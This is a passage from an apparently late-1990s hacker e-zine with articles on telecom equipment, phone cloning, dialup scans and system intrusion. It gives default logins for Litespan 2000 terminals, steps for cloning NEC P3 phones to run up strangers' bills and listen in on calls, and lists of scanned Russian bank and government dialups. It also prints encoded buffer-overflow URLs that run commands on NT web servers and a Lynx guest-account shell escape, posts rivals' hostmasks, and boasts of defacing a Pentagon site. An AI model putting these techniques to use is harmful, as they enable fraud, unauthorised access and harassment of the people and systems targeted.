happen every once in a while when to sw1tches d0nt c0mmunicate .. but g0d damn people.. anyway.. th1s f1le pr0bably did nuffin for your clooless self.. but maybe spawned a couple ideas in your head such as efpee diverting diagr4ms mee -> oki -> pbx with intercept opt access at *9 -> opdivert -> vmb with 800 dialout -> teltrust -> k0d3z -> pbx -> sekret service in 206 "TR4C3 TH1S MUTHA FUCK3R" I typed in 30 minutes without leet speek filter.. 4. An introduction to LightSpan 2000's : dlc 1 : The Basics. --------------- This article is going to be broken up into 3 parts because for convenience. Here is the first, if you don't understand this, don't move on. Also if you don't need to know anything about lightspans don't bother reading this act of masochism. A Litespan 2000 unit is a Synchronous Optical Network (SONET) based Optical Loop Carrier (OLC) system. It provides the function of four seperate systems cobmined into one. Those systems are as follows: Digital Loop Carrier (DLC). Provides 2,016 DS0s of bandwidth for delivery of services such as data, coin, or dial tone. Digital Cross Connect System (DCS). Takes apart DS1 signals into DS0, rearanges them and puts them back into DS1 signals. This is know as 1-0-1 cross-connect. SONET Fiber transport system Uses lightwave technology and SONET protcol to transport signals between lightspan terminals. Mulitplexer (MUX) Takes multiple low speed signals (DS0s, DS1s) and interleaves them to form a single high speed data stream at SONET bit rates. 2 : System Security. -------------------- Litespan 2000 unit security is very simple, but when considerig it accessability by outside systems, it is adequate. If you ever get access to a litespan 2000 terminal or are able to access it remotely this may help. The Litespan provides two levels of security to maintain system integrity. These security levels controls who can access the system and what the authorized user is allowed to do in the system. Each authorized user is assigned a set of privleges that determine the actions allowed to the user. The Litespan maintains an internal list of authorized user IDs, passwords, and user privleges. There are up to 20 users possible. Now to access security you will be prompted for a User ID and a password at a terminal that looks much like this : OMAPS Log In OMAPS V05.01.05 Copyright 1997 Optlink Corp. All Rights Reserved User Id: Password: Now for the ball busting part. If you repeat the login procedure incorrectly 5 times you will be locked out of the system. Also the user ID's can be up to 20 characters, a number or letters with both upper and lower case, this is the same with the password. The litespan has a sysadmin like in a unix system, but the litespan admin usually has a long beard and a smug expression. But it is possible that a dumb sysadmin will leave in the default logins/passwords. Those are as follows: User ID: optlink Password: optlink and.. User ID: sysadmin Password: sysadmin ...Well that gives you a look at System Security from the outside, Look at part 3 if you were able to get in. It gives a run down on User Privleges. 3 : User Privileges. -------------------- Well user privleges are important, the sysadmin maintainsa file in the system that gives different users different privileges. The user privileges file will be setup somewhat like this: User Id Password CP M M0 M1 N NR P PR P0 P1 S T Fatass ***** x x x x x x BigBone ***** x x x x x x That is a basic layout. The CP, M, M0 ect. are privileges. The X's are basically checks allowing a certain user to perform a certian act in the system. The Different Privleges are as follows: CP = Allows someone to change the user ID, password or privileges of any user on the system. This is one of the sysadmins privileges for the most part. M0 = Maintenance privilege (DS0 only) M1 = Maintenance privilege (DS1 only) MR = Maintenace READ ONLY privilege N = Network Administrative privilege; Allows backup and restore of database NR = Network Administrative READ ONLY privilege; Allows access to network information P = Provisioning privilege; Neccesary to make changes from the provisioning menu P0 = Provisioning privilege (DS0 only) P1 = Provisioning privilege (DS1 only) PR = Provisioning READ ONLY privilege S = System Administrative privilege; Neccessary to make changes from the administrative menu T = Testing privlege; Allows execution of testing commands Well that about raps it up. I may in the future update this, But I doubt it. Look for future papers by me. dlc 5. An introduction to the NEC P3 : daxx The NEC P3 is a rather old mobile phone for use on any TACS or E-TACS cellular telephone system (there is a list at http://c5.hakker.com/nec_p3/ to find out where there are such networks ; they exist in Europe, Austria, Italy, the UK and Ireland). This phone was quite popular a few years ago, so you should be able to pick one up used for little money. I got one including two batteries & a charger for 50 IEP. Now, what makes this phone so interesting? The availability of a so-called Test-Mode-ROM for it! As all mobile phones, this one has a read-only-memory chip in it, which contains its software. This progam is started when you turn on the phone, it could be compared to a computer's operating system. While the "normal" version of the NEC P3's software allows you to do no extraordinary things, basically only to place calls to a number you enter and to store numbers along with names, the test-mode software lets you go into test mode, where you can do many cool things... Most importantly, you can change all the information in the phone's NAM (number assignment module) - the ESN (electronic serial number) and the MIN (mobile identifier number). These two numbers are all there as an E-TACS phone's identity - program in another phone's ESN & MIN (this information is called a pair) and your NEC P3 becomes a clone of it. You will be able to make calls on the bill of the phone you cloned and to receive calls under its number. On a test-rom NEC P3, this process of reprogramming the NAM takes less than a minute of pressing buttons on the keypad, and requires no connection to a computer with a "chipping lead", as the vast majority of mobile phones do. However there are plans for a computer-to-P3 cable, along with chipping software, both are available on Dr. Who's Radiophone, which is now at... http://radiophone.dhp.com/nec/p200.html The MIN prefix for Ireland's 088 network is 2720 (088-2 = 2722, 088-6 = 2726). So if somebody's number is 088-313371, their MIN, and what you type in while programming, is 2720313371. The ESN of a phone (an 11 digit number with slashes dividing it) can almost always be found on a sticker on the back of the phone, under the battery. So if you see someone's phone lying around, just note down those numbers, put them in your P3, and mess up their bill. In test mode, you can also scan all channels (listen in on calls going on in your area), and break into conversations (can be funny, the call has to be on a very nearby cell for that to work though). I've also put on a text which describes how two P3's can be used as CB radios, without actually using the cellular network (never done this myself, can anybody confirm that this works?). You have a P3, and would like to put a test-mode ROM in it? Taking the actual chip out of the phone, or putting one in can be tricky, the first and biggest obstacle being "tamper-proof" screws in the case. However pliers with very thin ends worked OK, once I found suitable ones. The complete instructions for doing this can also be downloaded below. Getting the test-mode software (see below for the image file) written on the existing rom chip from a P3, or getting a new 27C512 (200 nanoseconds access time) EPROM with the software on it is probably the most difficult part. You could try some electronics companies or university electronics labs, or any other place which might be able and willing to write an EPROM for you. This only takes a minute, but a previously written EPROM has to be erased by exposure to UV light before being re-written, which takes at least half an hour. Further files are available from http://c5.hakker.com/nec_p3/ There's an easier way to get into test mode than the one. As you can simply store your ESN in one of the 99 memory slots once (enter 11 digits, STO (for instance) 68). Then every time you want to enter, you do RCL 68, STO 69, RCL *, RCL # 01 and there you are, instead of keying in the whole ESN every time. So, go out, get a P3 or another kewl fone and have some fun while the E-TACS networks are still on the air! DaXX 6. More Russian dialups : Lirik +7-o95-913-xxxx Iskra(?) Telco scan for carriers (?) 1997 CyberLirik/DarkMoon with ToneLoc 1.x comments to lirik@hotmail.com also check out http://207.222.215.67/________.lst 9133087 MMTEL> .x to get RemoteAccess 2503107111 .m to connect to MFD PAD NUA format : NUA with DNIC ie MMTEL>2503107111 9133442 27* 9133440 36* 9133438 34* 9133437 33* 9133439 32* 9133994 login: 9133340 9133465 CONNECT 2400/NONE 9135899 9133353 9133467 9133094 MICRON: ADDRESS? 9133093 9133487 MS DOS 6.20 :)(krug.partya.ru) ((null)) login: 9133118 S'Ad;r+kE:q't`aqQ1<8; 9133507 ***************************** 9133127 Port 1 login: 9133392 ROSPAC(IASNET) Local Dial Ups 02500 DNIC also TYMUSA [unpublished] ntymusa .concert+ for TYMUSA 9133578 HqS$=x1*M!J>8uF 9133336 0211  &v3  &v3  &v3  &v3  &v3+++ 9133327 +++ 9133418 9133297 BSDI BSD/386 1.1 (berenduin.comdiv.inkom.ru) (ttyb6) login: 9135745 FrontDoor 2.02; Noncommercial version 9135741 see Nodelist for more systems 9135611 ( 913- & Iskra2 like 097-3xxxx) 9135644 2:5020/439@Fidonet 9135982 9135903 9133478 9133503 9136066 9136007 2:5020/194@Fidonet 9136347 9132354 9137134 9139888 9133414 0211 iCv3 iCv3 iCv3 iCv3 iCv3+++ 9133117 PPP trash ~~}#@!}!Q} }4}"}&} }*} } 9134214 9135937 9133514 Welcome to SCO UNIX System V/386 Release 3.2 psl055!login: 9133038 Welcome to Linux 2.0.29. **EMSI_REQA77E 9133379 9133119 S'Ad;r+kE:q't`aqQ1<8;!nPSHHNrkShD 9133161 vBB Pl[EBad_Ver< 9135307 9136142 9136254 9135308 9135797 9138590 9137100 9138569 9137177 9136227 9133944 (gamma!uugate3) login: www.gamma.ru ISP 9132071 9133344 Telebit's NetBlazer Version 2.3 NB_CROCUS login: 9134392 ~?[l~m^p.:$KJ'b4f4wB&9uJ@0@abfD4* 9134217 Login: PassWord: 9134257 INCOM_ZNANIE 9134228 Welcome to X Atom Network 9134091 Sorry no BBS avalable on this phone 9134092 atom.ai.x atom.net!login: 9134221 Welcome to FaxNet IP network Login: 9134114 "%$(b% a".% (,o : 9134419 ࢥ 㯠 䠩 9134418 9134488 9134489 9135864 Username: % Username: timeout expired! 9135865 9135856 Enter: M menu driver, A ANSI, else N > 9135898 WindowsNT 4.0 (credit.roscredit.msk.su) (tty00) 9135319 9135751 SpaceNet Dial Up Gateway Problems: noc@space.ru 333 3523 9135020 www.space.ru 9135619 ICAICAICAICAICAICAICAICA 9135627 9135652 9135651 9135618 9135622 ~?[l~~?[l 9135640 9135995 QuickMail(tm) Copyright 1988 95 CE Software, Inc. 9135706 **B0100000027fed4 9135966 9135883 9135820 faxnet10 login: Welcome to the INTERACTIVE UNIX Operating System from SunSoft 9135626 Moscow DAWN 2.Relcom.EU.net 9135747 9135624 9135870 User Access Verification 9135798 ~?{=~~ 9135602 9135810 Welcome to the TECHNOBANK Client Bank System ! System name: techno 9135811 DIMON 9135641 Avtovazbank Guest/guest also x.25 NUA in Sprint 772855.1 9135621 USRobotics Courier HST Dual Standard V.34+ Fax Dial Security Session Serial Number 9909550000181645 9135941 ~}|{ 9135821 BSDI BSD/OS 2.0.1 (iskra.msk.su) (tty01) 9135921 Please press ... Enter password: 9135082 ]w]w]w]w]w 9135799  9137143 9136077 9137184 9136371 russica!login: 9136265 9136259 9136319 9136258 9136223 FreeBSD (ns.irex.ru) (ttyx2) login: 9136236 Welcome to Moscow Government's Mail Server 9136233 Contact phones is 200 5382, 200 5935 9136234 mshost!login: 9136997 Registered users only. Anonymous access denied. login: 9136173 =CREDO BANK= Bldg. 2, 9 Sadovay Sukharevskaya St. 9136311 Telecommunication system of the 9136316 State Tax Service of Russian Federation 9136368 23, Neglinnaya str, Moscow. 9136369 X.25 0250021500600 9136284 ENTER YOUR NAME => 9136313 PASSWORD => 9136958 The system's name is globex. Welcome to USL UNIX System V Release 4.2 Version 1 9136953 +++e3td|t63@EBwN,(qECKt3BY0C4x 9136232 Trying 10.31.11.4 ... Open 9136242 ENTER YOUR NAME => 9136210 9136304 BrakyTerm Mailer 0.01.9ESPM 9136395 .!`. /.& +." bl! 9136984 Russian Trading System (Telecommunication Center, Cisco 2511 1) 9137236 User Access Verification 9137228 9137248 Russian Trading System (node MSK_NCC) port 11(0)@ 9137203 @ 9137224 @HELP 9137211 @.uucp connected 9137218 @.CRT 9137213 9137243 9136175 ~HM 9136052 l'@kN,$?<~1!\_tj6Cv!DR})i@D@CrO0|6qZ73d 9139773 INCOMHOST 9133598 Network Access SW V1.5 for DS700 08 (BL95 33) ElecsBank DS700 8 Communication Server BRAVO> 9135815 p 9139234 ҍ 9137270 ଠ樮 ⢮ ࠫ쭮 ᥫ쭮 WWW cࢥ: WWW.molot.ru ᫨ ॣ஢, login: guest () 9137166 Only for @MAIL (other NUAs do not work) Sprintnet Local Dial-Ups 02501 & 03110 DNICs GlobalOne = Sprintnet = Telenet send "@D" send "d1" on TERMINAL= prompt type NUA on @ prompt (details http://207.222.215.67/x25.html) 9139936 PPP for enterprise customers GlobalOne 9133571 RosNet Dialup 02506 DNIC http://207.222.215.67/x25.html try 6100255 address 9132376 Russia@Online DialUp 30 lines 9138111 33.6 www.rinet.ru Login: guest X3(unknown) systems 9135646 9138173 9136024 9138294 9138453 9136235 9137012 9137231 9135705 9136093 9132252 9138365 9133551 9136046 9136082 9136235 9136034 9136370 9136021 9133498 9133069 9133241 9133916 9133021 9133918 9133398 9134009 9134239 9134425 9134421 9134422 9134094 9134069 9134560 9134218 9134258 9135951 9135364 9135922 9135177 9135088 9136457 9136498 9136239 9136185 9136139 9135381 9135705 7. UK x.25 network numbers : Cold-Fire AT&T Istel ---------- 01224-582082 Aberdeen 01224-580217 Aberdeen 01970-611022 Aberystwyth 01904-430404 York 01522-512050 Lincoln 01292-289595 Ayr 01245-267167 Chelmsford 01295-272828 Banbury 01271-449281 Barnstaple 01203-552092 Coventry 01705-327575 Portsmouth 01223-314594 Cambridge 01232-661188 Belfast 01232-661733 Belfast 01533-750240 Leicester 01527-584546 Redditch 0121-478-0002 Birmingham 01604-230734 Northampton 0191-386-2822 Durham 0117-279139 Bristol 01202-530882 Bournemouth 01392-217071 Exeter 01742-729590 Sheffield 01273-206733 Brighton 01582-401887 Luton 01273-820236 Brighton 01733-555575 Peterborough 01782-289866 Stoke-on-Trent 01383-737557 Dunfermline 01272-279138 Bristol 012572-65571 Chorley 0117-279808 Bristol 01752-673352 Plymouth 01532-424111 Leeds 01223-323155 Cambridge 01463-243411 Inverness 0171-831-9097 London 01227-450941 Canterbury 01227-453502 Canterbury 01892-515580 Tunbridge Wells 01473-231631 Ispwich 01422-330585 Halifax 01962-844211 Winchester 01222-460888 Cardiff 01602-475161 Nottingham 01634-815055 Chatham 0181-965-7767 London 0141-566-3334 Glasgow 01452-307766 Gloucester 01245-492460 Chelmsford 01289-308668 Berwick 01633-244456 Newport (Gwent) 01302-340698 Doncaster 01492-517111 Colwyn Bay 01792-475533 Swansea 01743-241631 Shrewsbury 01734-351616 Reading 01302-200636 Dundee 01642-225226 Teeside 01865-749555 Oxford 0161-941-6319 Manchester 01482-446444 Hull 0151-691-1312 Liverpool BT PSS Dialups -------------- 01232-331284 Belfast 0161-834-5533 Manchester 0171-490-2200 London 0151-255-0230 Liverpool 0121-633-3474 Birmingham 0117-211545 Bristol 01492-860500 Llandudno 01522-532398 Lincoln 01639-641650 Neath 0141-204-1722 Glasgow 01533-628092 Leicester 01463-711940 Inverness 0171-283-9123 London 0181-681-5040 London 01889-576610 Rugeley 01227-762950 Canterbury 01539-561263 Sedgwick 01424-722788 Hastings 01228-512621 Carlisle 0181-905-9099 London 01532-440024 Leeds 01865-798949 Oxford 01245-491323 Chelmsford 01654-703560 Machynlleth 01733-555705 Peterborough 01472-353550 Grimsby 01752-603302 Plymouth 01603-763165 Norwich 01202-666461 Poole 01793-541620 Swindon 01270-588531 Crewe 01772-204405 Preston 01734-500722 Reading 091-261-6858 Newcastle-on-Tyne 01582-481818 Luton 01872-223864 Truro 01709-820402 Rotherham 01895-846091 Warminster 0131-313-2137 Edinburgh 01926-451419 Leamington Spa 01732-740966 Sevenoakes 01602-506005 Nottingham 01392-421565 Exeter 01743-231027 Shrewsbury 01273-550045 Brighton 01422-349224 Halifax 01703-634530 Southampton 01242-227547 Cheltenham 01823-335667 Taunton 01597-825881 Llandrindod Wells 01553-691090 Kings Lynn 01222-344184 Cardiff 01642-245464 Middlesbrough 01473-210212 Ipswich 01223-460127 Cambridge 01904-625625 York 01224-210701 Aberdeen Sprintnet --------- 0171-973-1030 London Tymnet ------ 0131-313-2172 Edinburgh 0181-566-7260 London 01223-845860 Cambridge 0117-255392 Bristol 01232-234467 Belfast =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== 1. A short introduction to IPv6 : so1o IPv6 is described in detail in RFC 1884, It is commonly noted as the "Next Generation Internet Addressing System", IPv4 had some shortcomings that became obvious once the internet had grown substantially in size and complexity, the main factor was that IPv4 used 32-bit address sizes, whereas IPv6 can allocate 128-bit addresses.. IPv6 address representation is much like that of IPv4, because the addresses are represented in strings of digits divided by seperators, but IPv6 addresses differ in that they take the form nn:nn:nn:nn:nn:nn:nn:nn, where each nn represents the hexidecimal form of 16 bits of address. IPv6 also differs in more complex ways, but this is just an introduction...For the full details see RFC 1884. IPv6 has identified 3 types of address, these are unicast, multicast and anycast, here is a neat ascii diagram to explain the 3 different types... Unicast : --------- Host 1 Host 2 IP Packet -------------------------------> Host 3 Host 4 Host 5 Multicast : ----------- Host 1 /------> Host 2 / and IP Packet -------------------------------> Host 3 \ and \------> Host 4 Host 5 Anycast : --------- /--> Host 1 / or /------> Host 2 / or IP Packet -------------------------------> Host 3 \ or \------> Host 4 \ or \--> Host 5 So thats basically whats so neat about IPv6, if you want to know the formats for the unicast, multicast and anycast addresses, then read RFC 1884. Summary.. --------- IPv6 offers a more permenant solution, as it incorporates flexible address space, as well as support for accessing the public internet and private IP-based networks from the existing enterprise LANs and WANs. so1o 2. Newbie sk00l : so1o This time we will learn how to use the find and cat commands effectively.. cat === usage : cat [options] [files] options : ---------- -e : Print a $ to mark the end of each line -n : Print the number of the output line to the lines left; start with 1 -s : Squeeze out extra blank lines -t : Print each tab as I^ and each form feed as L^ -v : Show control and nonprinting characters -a : same as -vet examples : ---------- cat ch1 : display a file cat ch1 ch2 ch3 > all : combine files to form 'all' cat note5 >> notes : append note5 to the notes file cat note5 > notes : overwrite notes with note5 cat > temp1 : create a file, end with EOF cat > temp2 << STOP : create a file, end with STOP find ==== usage : find [pathnames] [conditions] examples : ---------- find $HOME -print : lists files and subdirectories in your home directory. find /work -name letter -print : looks for letter starting its scan in the /work directory find /work -name 'memo*' -user ann : looks for any files beginning with memo, owned by ann find / -size 0 -ok rm {} \; : looks for, and removes all files that are 0 bytes, prompts you before removal One very good book with such commands in, that I recommend, is... Linux In A Nutshell Jessica Hekman O'Reiley ISBN 1-56592-167-4 US $19.95 CAN $28.95 so1o 3. Windows NT filesharing basics : chameleon Now to you NT gurus this is all very basic but since most of you are Unix hackers you probably dont know shit about windows. It is a must to start learning Windows now (heh -so1o). NT is getting big. More and more each day people are starting to use it. Yes I agree I hate NT and love a good 'ole Unix box but we must keep up with technology. NT is widely used even by places like the Pentagon. (*cough* it was easy to hack *cough*) Ok class lets start... Say you have an IP address that you want to try and get access to you would do this... Example for IP address: 194.8.235.73 Note: Use IP addresses because the name address sometimes wont work and the IP will so use IP addresses. Drop to dos... c:\windows> nbtstat -A 194.8.235.73 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- MAILGATE <00> UNIQUE Registered MAILGATE <03> UNIQUE Registered MAILGATE <1F> UNIQUE Registered MAILGATE <20> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MIRAGE <00> GROUP Registered MIRAGE <1D> UNIQUE Registered MIRAGE <1E> GROUP Registered MAC Address = 00-00-00-00-00-00 --------------------------------------------------------------------- |Note: this will list the remote hosts name. The name is set in the | |control pannel/networking/indentification/computername. | --------------------------------------------------------------------- Now that you have the computer name you need to tell windows the IP that maps to that computer name. So to do this you need to edit c:\windows\lmhosts open it in notepad or whatever. It will look like this... 127.0.0.1 localhost you want to add the ip 194.8.235.73 and then press tab and enter the computer name. so the new hosts file will look like this. 127.0.0.1 localhost 194.8.235.73 MAILGATE This sets up a computer name mapping to the IP address of the computer to try and get into its filesharing. Save this and then click your Start Button then goto find, then computer, then enter the computer name and it will connect to that computer name that you added into the hosts file. It should show the computer as being found. Double click it and then if your lucky it wont have a password but if you aren't you will be prompted for a password which you will have to try and guess or use a brute force cracking program. Solar Designer also coded and distributed some Windows NT and 95 remote buffer overflows, here are his 2 main examples...the URL's have been split into seperate lines so we can see them : -- WinNT (any version?): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A %06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10% FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy _\WebSite\readme.1st_\WebSite\htdocs\x1.htm -- Win95 (the release version only, will crash others!): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A %06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0 3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\ x1.htm You can change the commands in each case, using _ instead of a space. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request). Hope this was a little help. If not at least you know how to use windows file sharing... Anyone good at coding in windows? Wanna code a brute force hacking program for windows file sharing? E-Mail me... The Chameleon Chameleon@intercore.com.ar InterCore Security Corp. http://chameleon.core.com.ar http://www.intercore.com.ar 4. BitchX / crackrock bug : so1o / Shok This is another bug along the lines of the one that causes BitchX clients to segfault if a particular mode is set in a channel.. The bug was originally found by Shok, it's just a quick thing, nothing special, just for novelty value really, this is what you do... 1) join a channel with a { character in the name 2) set the topic to something with more than 20 characters Now, if anyone using BitchX and crackrock joins your channel, they will segfault and quit, in tests however, this showed to sometimes take a short while (usually about a minute) before they quit.. 5. Nifty Lynx trick : Electric Nectar Ok so you're trying to get a valid account on a server for whatever reasons. (busting root, taking a look around, etc.) You've tried telneting to port 79, 25, and got a couple valid accounts, and have tried hopelessly to just guess the passwords. This is not the approach to take. Throughout my experience, while trying to gain a valid account on various servers, I've run into many that run a guest lynx account. The purpose of this account is just what it sounds like, it gives no access to the server itself, but rather let's you only run lynx (a unix-based, text only, web browser). The account is designed to be accessed by outsiders. The most common lynx login's and passwords are: -lynx/lynx -guest/guest -guest/lynx -www/wwww -www/lynx Ok well I think you get the idea, be creative if one doesn's work. First off though, you need to make sure the account exists. Simply telnet to port 79, and try typing in a possible lynx account name. If it varifies it your set. Now if 79 isn't open, just telnet to port 25, and type 'vrfy username'; username being the name of a guest lynx account. This too will varify the account. Here's an example... Finger: Trying... Connected to host.com Escape character is '^]'. lynx Login name: lynx In real life: Lynx Guest Account Directory: /home/lynx Shell: /usr/bin/lynx No Plan. Smtp: Trying... Connected to host.com Escape character is '^]'. 220 host.com ESMTP Sendmail 8.8.5/8.8.2; Fri, 3 Oct 1997 19:53:40 - 0400 vrfy lynx 252 Now remember, a lynx guest account isn't a common thing on most servers, although I have seen it on quite a few. This is just an alternate plan of getting a shell on an otherwise, unaccessable server, if the situation exists. If you cannot validate a guest lynx account, don't be surprised. Next order of business is to login of course. It should be fairly simple. Since it is a guest lynx account, the login and password should be somewhat obvious, usually the password is the same as the login.... $ telnet host.com Trying... Connected to host.com Escape character is '^]'. Linux 2.0.29 (host.com) (ttyp0) Welcome to Linux 2.0.29. host login: lynx Password: Linux 2.0.29. Last login: Fri Oct 3 17:11:59 on ttyp0 from ppp1.host.com You have new mail. ...Ok, your terminal should look something like this... ---------------------------------------------------------------------------- Lynx (default page crap here) _________________________________________________________________ -- press space for next page -- Arrow keys: Up and Down to move. Right to follow a link; Left to go back. H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list ----------------------------------------------------------------------------- ...Now the following trick is something I developed after several minutes of devising a plan to make lynx pop me into a shell. Now that you are in lynx, hit 'O' for the options menu. Ok the options menu should come up, let's take a look at it... ----------------------------------------------------------------------------- Options Menu (Lynx Version 2.6) E)ditor : NONE D)ISPLAY variable : NONE B)ookmark file : lynx_bookmarks.html F)TP sort criteria : By Filename P)ersonal mail address : NONE S)earching type : CASE INSENSITIVE display (C)haracter set : ISO Latin 1 Raw 8-bit or CJK m(O)de : ON preferred document lan(G)uage: en preferred document c(H)arset : NONE V)I keys : OFF e(M)acs keys : OFF K)eypad mode : Numbers act as arrows li(N)e edit style : Default Binding l(I)st directory style : Mixed style sho(W) dot files : OFF U)ser mode : Novice user (A)gent : Lynx/2.6 libwww-FM/2.14 Select capital letter of option line, '>' to save, or 'r' to return to Lynx. ----------------------------------------------------------------------------- Notice the E)ditor option. That's what we're after. The purpose of it is to edit the file currently open in lynx with the supplied text editor. Lynx usually expects you to put in something like joe, pico, vi, etc. But we can supply anything we want, and it will use it with the syntax: [editor] Ok, here's where we get inovative. Hit 'E' to type in an editor. For the editor, type: exec. Ah yes, those of experience are now starting to nod their heads. Now hit 'shift+period key' or '>' to save the options. You now return to the default screen. Next step. Hit 'g'. You will be prompted to enter a URL. For the URL put the following: file://localhost/bin/sh If all goes according to plan, /bin/sh will open as binary garbage in lynx. Now, normally if you hit 'e' with a default text editor set in the options menu, it would edit /bin/sh as a text file. But thanks to our little exec fix, it will now exec /bin/sh. And we all know what that does: pops us into a bash shell! Here's an example of the act in progress... ----------------------------------------------------------------------------- ELF4?4 (444 yyH[1/lib/ld-linux.so.1j5H[&mU dao Qx")Bs|Ng8LW+ST eP{ut!i:@%`Mb9Aq7>=.~ZGFY/O]PcToh"w"~&"`T("X& $H@ Th"""&"" ("G"bxWx<"x<(F*l0j98tBK\R_TfTmTy4libtermcap.so.2strcpyioct ltgetnum_DYNAMICtgotogetenv__strtol_internalfgetsmemcpymalloctgetflag__environB C_initwritestrcattputsstrncmpstrncpyreallocPCfopenfclosetgetent_finiatexit_GLOB AL_OFFSET_TABLE_exitUPstrchrtgetstrfreelibc.so.5__ctype_b__ctype_tolower__ctype _toupperbzerostrcmpgetpid_xstatgetcwdgetwdstrerrorfcntl_fxstatstrrchrenvironfnm atchgeteuidgetuidgetgidgetegidkillpgtcflowtcgetpgrptcsetattrtcsetpgrpopensigact ionsigaddsetsigprocmaskalarmclosegetdtablesizelongjmp__setjmpsigdelsetatoiatolq sortbcopystrncatgethostnameisattytcgetattrsys_siglistwaitpidgetpeername_lxstate rrnoclosediropendirreaddirreadaccesschdirdupdup2execveforkgetgroupsgetppidkilll seekpipesetgidsetuidtimesumaskunlinkgetpgrpgetrlimitsetpgidsetrlimittime__setfp -- press space for next page -- Arrow keys: Up and Down to move. Right to follow a link; Left to go back. bash$ O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list ----------------------------------------------------------------------------- ...If you look in the very bottom left corner you will see it! (bash$) A simple 'clear' command will get rid of the rest of that mess. Often times the TERM setting will be all messed up. Simply fix that by typing: TERM=vt100 export TERM And there you have it folks! a bash shell popped off of a lynx guest account. Now feel free to look around, run a few exploits, whatever, what you do beyond here is totally up to you. Hope you enjoyed today's little lesson, and I hope you get a chance to put it to work sometime. Take it easy all. 6. No-more negative : so1o Over the last few months, starting roughly in April 1997, myself, D-Storm and a few others have been playing around with sIn (lame Windows coding group, think they're all big and bad, when they are really quite cl00le$$), we found out certain members names and addresses, as well as hacking their website in August - www.sinnerz.com (as promised back in April by myself), the hack is documented at www.hacked.net under the August exploited section. In a way, this has lead to a handful of their members leaving the group after realising how much they are hated, as well as their webpage being taken down due to the fact that lameass LordSomer hacked it after we did, so it's not all dandy in the lame world of sIn after all, its all falling apart at the seams.. So we have decided that from now on, we won't waste our time with this dead group, they have been proven beyond all doubt to be the lame and weak, and now it's time to let them rest in peace, we have set out what we intended to do, and now it's over, we proved our point in the end. Fucking Hostile and The Banshee and are the only real members of sIn still around, they keep changing their nicks on irc to hide their identity, so we have decided to post their hostmasks, as a final reminder, that they will never be forgotten as the fools they were proven to be.. Fucking Hostile : *!hostile@*.qni.com The Banshee : *!bob@*.accessmd1.dataplace.net so1o =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== 1. Pentagon hacked : so1o chameleon of the carparts crew (#carparts on undernet), used his elite Windows NT tekneeqs to break into, and modify the .html on... http://www.pentagon-ai.army.mil The details of the hack are fully documented on www.hacked.net, under the October exploited section, notice the greet to CodeZero, heh. =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== 1. TOTALCON '98 : so1o $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ http://www.aom.co.uk/total/ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ +------------------------------------+------------------------------------+ An Official TotalCon Announcement An Official TotalCon Announcement An Official TotalCon Announcement An Official TotalCon Announcement +------------------------------------+------------------------------------+ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ http://www.aom.co.uk/total/ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ TotalCon '98 is now a reality, here are preliminary details... ============================================================== Venue : The Old Firestation, Silver Street, Bristol, ENGLAND Date : Late March 1998 (probably the last week) Duration : 36 hours non-stop (midday -> 10:00pm next day) Cost : 15 (15 UKP) ON THE DOOR, this will go back into the event (beer etc.) What : 12 system network (with additional terminals) along with full internet access, bring your laptops! Loud music, live DJ's Fully licensed bar downstairs / next door Elite UV and spotlighting ALOT of cool people ^^^^^^^^^^^^^^^^^^^ *** NO SPEAKERS WHATSOEVER *** *** NO SPEAKERS WHATSOEVER *** Travel : Easily accessible by car, train, bus, plane or boat. Accomodation : You can hang around the Firestation or book one of many good hotels in the immediate area. Notes : ALL CA$H RAISED AT THE DOOR FROM ENTRANCE FEES WILL GO BACK INTO THE EVENT! WE WILL PURCHASE GREAT AMOUNTS OF BEER AND FOOD, PROBABLY EVEN A LAPTOP AS A PRIZE!! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ http://www.aom.co.uk/total/ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ +------------------------------------+------------------------------------+ An Official TotalCon Announcement An Official TotalCon Announcement An Official TotalCon Announcement An Official TotalCon Announcement +------------------------------------+------------------------------------+ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ http://www.aom.co.uk/total/ 